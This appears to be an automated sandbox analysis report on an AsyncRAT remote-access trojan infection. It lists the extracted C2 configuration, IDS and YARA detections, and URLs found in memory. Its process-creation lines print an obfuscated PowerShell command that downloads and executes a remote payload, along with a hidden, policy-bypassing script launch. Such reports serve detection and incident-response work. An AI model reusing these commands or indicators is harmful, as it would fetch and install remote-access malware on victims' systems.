Click to jump to signature section
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: AsyncRAT {"Server": "kareemovic11.duckdns.org", "Port": "6606,7707,8808", "Version": "AWS | RxR ", "MutexName": "AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd", "Autorun": "false", "Group": "true"} |
Source: | Binary string: NewPE2.pdb source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp |
Source: | Binary string: NewPE2.pdb(@ source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp |
Source: Network traffic | Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: Network traffic | Suricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: Network traffic | Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: Network traffic | Suricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738 |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F05D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://afclifescience-tiurma.com |
Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enqq |
Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: wscript.exe, 00000000.00000002.1753518951.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.LWD |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8DB31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com |
Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/ |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659367243.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1752878264.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753459649.000002092E8C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txt |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtLMEMX |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtWRx |
Source: wscript.exe, 00000000.00000003.1660289317.0000020930687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtc |
Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtkR |
Source: wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/jxs.txtsC: |
Source: powershell.exe, 00000001.00000002.1717634059.0000021E8BE58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/rkem.jpg |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://afclifescience-tiurma.com/rkem.jpgX |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8E4DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX |
Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR |
Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" " | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'" | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B821E22 | 1_2_00007FFD9B821E22 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B822964 | 1_2_00007FFD9B822964 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82458A | 1_2_00007FFD9B82458A |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82A7A2 | 1_2_00007FFD9B82A7A2 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B82351A | 1_2_00007FFD9B82351A |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B825302 | 1_2_00007FFD9B825302 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B824B2A | 1_2_00007FFD9B824B2A |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD9B7F1A36 | 6_2_00007FFD9B7F1A36 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_071F1B10 | 8_2_071F1B10 |
Source: dump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04 |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys |
Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, oqwGSofdlOxxXlf.cs | Base64 encoded string: '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 |